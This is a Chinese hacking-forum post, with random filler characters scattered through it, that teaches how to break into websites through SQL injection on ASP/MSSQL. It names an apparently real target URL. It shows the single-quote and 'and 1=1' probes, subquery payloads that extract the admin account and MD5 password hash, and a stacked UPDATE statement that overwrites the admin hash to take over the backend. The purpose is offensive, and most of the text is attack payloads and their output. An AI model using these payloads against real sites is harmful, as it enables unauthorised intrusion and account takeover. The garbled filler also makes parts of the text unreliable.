经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
, T! K: h' o1 }# j) \可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
5 H9 x; ~5 s# }8 O测试如下:" o" F3 k! \; ]' v# P8 D6 r: N
http://www.tmdsb.com/news.asp?id=121
4 {* D7 J/ B- M, t; c- [在地址后输入单引号,显示/ [& ]: D# l) l: B% w; }
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’/ L1 Z8 i2 q9 P
字符串 ’’’ 之前有未闭合的引号. T5 K& j; t8 | X2 C4 |
/news/tmdws.asp,行63
- _$ X/ y1 r& N3 H- O |说明没有过滤单引号且数据库是MSSQL.
3 E9 F5 {5 {, W0 m1 i$ ~) f7 o' [and 1=1正常。and 1=2出错。肯定存在注入, k; X6 Z6 k, ~/ a/ I6 u- h
接着输入
9 J0 O0 M; v ?" k) M/ khttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)" w: I6 X+ \3 V! h1 E9 t# m
得到帐号为:admin
) w/ f# g* d6 E& ~( r" O" c6 khttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)+ K4 I$ T1 y. D5 P8 T# a' g1 m
得到密码为:a4716077c2ba075c
! \2 J( h! U. b, G$ @8 s接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
' C' z+ |% |: d' B2 h& [命令如下 :
! c' u4 @9 e' P x6 p8 Q;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
1 ?4 n- Z. }8 J/ s2 U这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41